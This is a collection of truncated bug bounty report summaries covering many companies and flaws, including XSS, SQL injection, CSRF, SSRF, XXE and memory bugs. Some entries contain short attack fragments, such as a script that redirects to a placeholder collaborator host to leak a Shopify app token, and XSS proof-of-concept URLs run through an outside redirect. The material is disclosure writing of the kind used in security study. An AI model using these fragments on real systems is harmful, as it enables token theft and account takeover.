Internet Bug Bounty: null pointer dereference in imap_mail
In imap_mail, if the message argument is null, _php_imap_mail does not check whether a message could be obtained, so it crashes: `fprintf(sendmail, "\n%s\n", message);` /usr/local/php/bin/php ./craxxx.php Warning: imap_mail(): No message string in mail command in /home/fan/github/php-7.2.10/myselffuzz/craxxx.php on line 3 sh: 1: -t: no...
Mail.ru: xss
XSS was reported for bb.cdn.gmru.net domain. This domain is considered sandbox with no security impact for XSS, but same XSS also existed in bb.mail.ru subdomain...
HackerOne: Information disclosure
Summary: Chaining a few simple informative issues on the HackerOne platform and applying a new method of timing attack, exploiting an interesting feature in HTML5 https://developer.mozilla.org/en-US/docs/Web/API/Resource_Timing_API/Using_the_Resource_Timing_API (more precisely, "Copy with CORS"), we can perform low cost,...
LocalTapiola: Reflected XSS+CSRF on secure.lahitapiola.fi
Basic report information Summary: The secure.lahitapiola.fi -mail application contains a reflected XSS vulnerability which can be exploited for example with CSRF-attack. Description: As mentioned in the summary, the site contains a reflected cross-site scripting vulnerability. This vulnerability ...
Coinbase: Ethereum account balance manipulation
The researchers noticed an issue with our ETH receiving code when receiving from a contract. This allowed sending of ETH to Coinbase to be credited even if the underlying contract execution failed. The issue was fixed by changing the contract handling logic. Analysis of the issue indicated only...
Gratipay: i am The bug
I am the bug. I found a bug in your site, here it is F234717. My friends are the greatest hackers hackerone.com/s4k16 and smziaurrashid told me you will give me $$$ for my father F234723...
VK.com: CSRF Add a view to a post without the user's knowledge.
Missing hash parameter when counting post views. The hash parameter was missing when counting post views. It was possible to mass-inflate view counts on posts. Views were counted even for a private group, despite our having no access to it. The PoC looked like this:...
Zomato: SQL Injection, exploitable in boolean mode
Issue The reporter found a SQL injection in one of the applications in www.zomato.com. Fix The issue was investigated and found to be valid and fixed...
Airbnb: Nginx Version Disclosure
Hello, While I was testing Airbnb I found an nginx version disclosure in the HTTP response, which can help an attacker gain information, or an attacker might use the disclosed information to harvest specific security vulnerabilities for the version identified. URL: https://www.airbnb.com/ Version: 1.7.12...
Ubiquiti Inc.: XSS via SVG file
Hello Ubiquiti, Details: I was able to upload an SVG file here, so I uploaded an SVG file with XSS in its code, and if the attacker gives the link to his victim he can grab the victim's cookie. And regarding your "Upload image" SVG file, it uploaded even though it has an error. PoC link F167791 Fi...
LocalTapiola: SQL Injection on `/cs/Satellite` path
Summary There exists an SQL Injection vulnerability on the path /cs/Satellite. This path accepts numerous fields, including blobtable, blobcol, blobkey and blobwhere. It is possible to sufficiently manipulate the blobwhere field in order to trigger a time-based blind SQL Injection attack. Sco...
Uber: Reading Emails in Uber Subdomains
Possibility to read emails from various Uber subdomains. None of the domains exposed were actively being used for Uber email communication to employees or users. Possibility of reading emails sent to certain Uber domains. Link to blog:...
Uber: Server version disclosure
Hi Uber, maybe this is a low risk, but I want to report that the nginx and OpenResty server versions are being disclosed. For OpenResty: Accessing this URL: https://chef.uberinternal.com/ will give you an error "502 Bad Gateway", but you can see on the page that the server version was disclose...
Paragon Initiative Enterprises: SMTP server allows anonymous relay from internal addresses to internal addresses
Hello, Issue description: your incoming SMTP servers, provided by Google, seem to be accepting, without authentication, mails from addresses @paragonie.com destined for addresses @paragonie.com. This can greatly ease spear-phishing attacks, as users usually put much trust into emails coming fro...
Uber: Phone Number Enumeration
I discovered it is possible to retrieve all of Uber's customers' cell phone numbers using an API endpoint. While going through a sign-up form, I noticed that the page was making an AJAX call to an API to validate the email address being entered and to make sure it doesn't already belong to an accoun...
Zendesk: [CRITICAL] CSRF leading to account take over
Hi, I have found a CSRF issue in .zendesk.com/jobs/createjob that leads to full account take over. Details: When using bulk user import in https://.zendesk.com/import?kind=user, after you upload a CSV file and press import, a request is sent to...
QIWI: XML External Entity (XXE) in qiwi.com + waf bypass
While testing the tax payment service, I found that your server endpoint https://qiwi.com/order/external/multiple.action is vulnerable to an XML External Entity attack. Although the server doesn't respond with any information, an attacker can still use the out-of-band XXE technique to read arbitrary files on the serve...
Mail.ru: [odnoklassniki.ru] XSS via Host
XSS via the Host header in the Internet Explorer browser, using a redirect bug. PoC: http://blackfan.ru/x?r=http://odnoklassniki.ru%252f%253f%2523"alertdocument.domain" http://blackfan.ru/x?r=http://ok.ru%252f%253f%2523"alertdocument.domain" HTTP Response:...
HackerOne: Accepting Invalid characters on email address
I tried to change my email address on hackerone.com, and when I tried adding null bytes, it was accepted by hackerone.com. I am registered with ███ and I tried to change my email address to ████%00, and guess what, this address was granted as an email address...
curl: Security Analysis Report: CURL Integer Overflow Vulnerability
Vulnerability Overview. Vulnerability Type: Integer Overflow in HTTP chunked encoding. Location in Source: lib/http_chunks.c line 173; lib/curlx/strparse.c lines 185–186. Impact: Integer overflow leads to memory corruption; can cause buffer overflow; results in Denial of Service (DoS) for curl. Potential...
curl: Incorrect Encoding Conversion in hostname results in indeterminate SSRF vulnerabilities
Vulnerability description not provided...
FetLife: Able to see highest poll result without voting or view result
Vulnerability description not provided...
Internet Bug Bounty: Cargo not respecting umask when extracting crate archives
Cargo did not respect the umask when extracting crate archives on UNIX-like systems, potentially allowing a local attacker to modify the source code compiled and executed by the current user...
Internet Bug Bounty: CRLF Injection in Nodejs ‘undici’ via host
A vulnerability was discovered in the fetch API of Node.js versions 16.x, 18.x, and 19.x that allowed for CRLF injection in the 'host' header, potentially leading to attacks such as HTTP response splitting and HTTP header injection. The vulnerability was fixed in security releases...
Nextcloud: Mail app - blind SSRF via smtpHost parameter
A blind SSRF vulnerability was discovered in the Nextcloud Mail application, allowing an attacker to retrieve services running locally on the server and scan the internal network for information. The vulnerability was found in the smtpHost parameter and could be exploited by any user with the mai...
KAYAK: 1 click Account takeover via deeplink in [com.kayak.android]
Vulnerability description not provided...
Internet Bug Bounty: CVE-2022-30115: HSTS bypass via trailing dot
Advisory: https://curl.se/docs/CVE-2022-30115.html Original Report: https://hackerone.com/reports/1557449 Impact HSTS bypass...
HackerOne: Blind XSS in app.pullrequest.com/████████ via /reviews/ratings/{uuid}
Summary: Hi, While researching PullRequest yesterday, I saw some "review" endpoints in web archive of "app.pullrequest.com". http://web.archive.org/cdx/search/cdx?url=app.pullrequest.com/&output=text&fl=original&collapse=urlkey One of them was...
U.S. Dept Of Defense: CVE-2020-3187 - Unauthenticated Arbitrary File Deletion
A vulnerability in the web services interface of Cisco Adaptive Security Appliance (ASA) Software and Cisco Firepower Threat Defense (FTD) Software could allow an unauthenticated, remote attacker to conduct directory traversal attacks and obtain read and delete access to sensitive files on a targeted...
GitHub Security Lab: New experimental query: Clipboard-based XSS
This bug was reported directly to GitHub Security Lab...
U.S. Dept Of Defense: XSS on ███
Hi, I found XSS on ██████████ IP Enumeration ████. Go to https://███/+CSCOE+/logon.html?a0=15&a1=&a2=&a3=1, intercept the request with Burp Suite and send it to Repeater, then edit the request to look like this: GET /+CSCOE+/saml/sp/acs?tgname=a HTTP/1.1 Host: ██████████ User-Agent: Mozilla/5.0 Windows ...
h1-ctf: ccc ctf
██████████ will send detailed report later Impact can get admin credentials...
UPchieve: User enumeration through forget password
Vulnerability: User enumeration is possible through the forgot password feature. Steps to reproduce: Go to the above selected domain and go to forgot password. Submit a random email and then intercept the request with Burp Suite. In the response you will get HTTP/1.1 500 Internal Server Error with "err":"No...
Internet Bug Bounty: Buffer overflow in PyCArg_repr in _ctypes/callproc.c for Python 3.x to 3.9.1
TL;DR Description: Python 3.x through 3.9.1 has a buffer overflow in PyCArg_repr in _ctypes/callproc.c, which may lead to remote code execution in certain Python applications that accept floating-point numbers as untrusted input, as demonstrated by a 1e300 argument to c_double.from_param. This occurs...
Shopify: Screenshot Service leaks X-ABS-App-Token
1. Login and create a development store. 2. Start Burp Suite and open a Burp Collaborator client, then copy the collaborator payload. 3. Edit the section header.liquid of your current theme, adding this: window.location="https://pasteherecollaborator/"; Finally go to...
Acronis: Get ip and Geo location any user via Clickjacking with inspectlet technology
Summary: Get the IP and geolocation of any user via clickjacking with Inspectlet technology https://geoapi.acronis.com/?q=admin/views/ajax/autocomplete/user/a Steps To Reproduce 1. go to F1015419 2. you will see your geo data, e.g. "city":"Abu...
PlayStation: Unrestricted access to quiesce functionality in dss.api.playstation.com REST API leads to unavailability of application
Report Summary ---- Unrestricted access to the quiesce function via a PUT request to https://dss.api.playstation.com/api/application/state makes the application unreachable for an uncertain amount of time. Steps To Reproduce ---- Reproduction method 1 + Burp Suite is the program required for the...
Internet Bug Bounty: CVE-2020-9383 Floppy OOB read
A vulnerability was found in the Linux Kernel up to 5.5.6 (Operating System) and classified as critical. Affected by this issue is the function set_fdc of the file drivers/block/floppy.c. The manipulation with an unknown input leads to a memory corruption vulnerability (Out-of-Bounds). Using CWE to declar...
h1-ctf: [H1-2006 2020] Solution for the h1-2006 CTF challenge
Hi, The flag is ^FLAG^736c635d8842751b8aafa556154eb9f3$FLAG$. I didn't know I can send it prior to the report until I saw some disclosed solutions from the previous challenges. The report will follow later today. Regards @thehackerish Impact Multiple vulnerabilities on .bountypay.h1ctf.com allow ...
Topcoder: Reflected XSS on error page on https://apps.topcoder.com/wiki/plugins/socialbookmarking/updatebookmark.action
Hi : In https://apps.topcoder.com/wiki/plugins/socialbookmarking/updatebookmark.action bookmarkPageId parameter expects a number value. If you add XSS payload instead of number, an error page displays with XSS. PoC...
Basecamp: CSRF on launchpad.37signals.com OAuth2 authorization endpoint
Hi, I found a CSRF in the OAuth2 authorization endpoint on launchpad.37signals.com. That allows a malicious 3rd party application to gain full API access to the victim's account in 37signals products that use OAuth2 authorization. I found that when making a POST request to the authorization endpoint it...
Glassdoor: web.xml configuration file disclosure
Information disclosed via https://www.glassdoor.com/web.xml which has been resolved. Thanks, @stregh for your report and find. Looking forward to more reports from you. CVE-2021-34429 CVSS Score: 5.0 CVSS Vector: AV:N/AC:L/Au:N/C:P/I:N/A:N...
Cuvva: Unclaimed facebook page at www.cuvva.com/about
Description: Hello sir, while I was surfing your website I found an unclaimed Facebook page at www.cuvva.com/about F503171. When you click this button you will be redirected to https://www.facebook.com/getcuvvad, which was unclaimed, but I claimed it as PoC. Steps to reproduce: 1. go to...
Valve: Unchecked weapon id in WeaponList message parser on client leads to RCE
Let's look at the WeaponList message parser code in the HLSDK: `int CHudAmmo::MsgFunc_WeaponList(const char *pszName, int iSize, void *pbuf) { BEGIN_READ(pbuf, iSize); WEAPON Weapon; strcpy(Weapon.szName, READ_STRING()); Weapon.iAmmoType = (int)READ_CHAR(); Weapon.iMax1 = READ_BYTE(); if (Weapon.iMax1 == 255)`...
Monero: Zero-amount miner TX + RingCT allows monero wallet to receive arbitrary amount of monero
NOTE! Thanks for submitting a report! Please replace all the square sections below with the pertinent details. Remember, the more detail you provide, the easier it is for us to verify and then potentially issue a bounty, so be sure to take your time filling out the report! Summary: By mining a...
Tron Foundation: DOS attack by consuming all CPU and using all available memory
Summary: A single request to submit a post to /wallet/deploycontract with several megabytes of bytecode, along with CPU-intensive long parsing, will consume CPU for about 10 minutes while still holding several megabytes of bytecode in the heap. With enough requests, let's say 1K-10K depending upon...
MyCrypto: SPF Records (SMTP protection not used)
Hello MyCrypto Team, I am checking your website and found something is missing in the SPF record. I don't find that you have applied a strict SMTP policy to stop spoofed email sending from your domain. I would like to recommend you to read the following article:...
Ubiquiti Inc.: Public Jenkins instance with /script enabled
Hi, First of all, I'm not 100% able to verify that this server is actually owned by Ubnt, as there are multiple DNS Names in the SSL certificate. DNS Name: .uum.com DNS Name: .ubnt.com DNS Name: .svc.ubnt.com DNS Name: .api.uum.com DNS Name: .svc.uum.com DNS Name: uum.com So, the server hosted on...
WordPress: Account takeover vulnerability by editor role privileged users/attackers via clickjacking
Vulnerability - Editor-role privileged users are able to hack into others' accounts by exploiting a clickjacking vulnerability. Version - 4.9.7 Issue - https://make.wordpress.org/core/handbook/testing/reporting-security-vulnerabilities/why-are-some-users-allowed-to-post-unfiltered-html As mentioned pe...
Automattic: RCE via Print function [Simplenote 1.1.3 - Desktop app]
In Simplenote 1.1.3 (Desktop app) there is a stored XSS vulnerability that can be used to execute arbitrary code. If there is malicious code in the note and the user tries to print it, for example to save it as a PDF, the malicious code runs. This report is based on report 291539, by Yasin...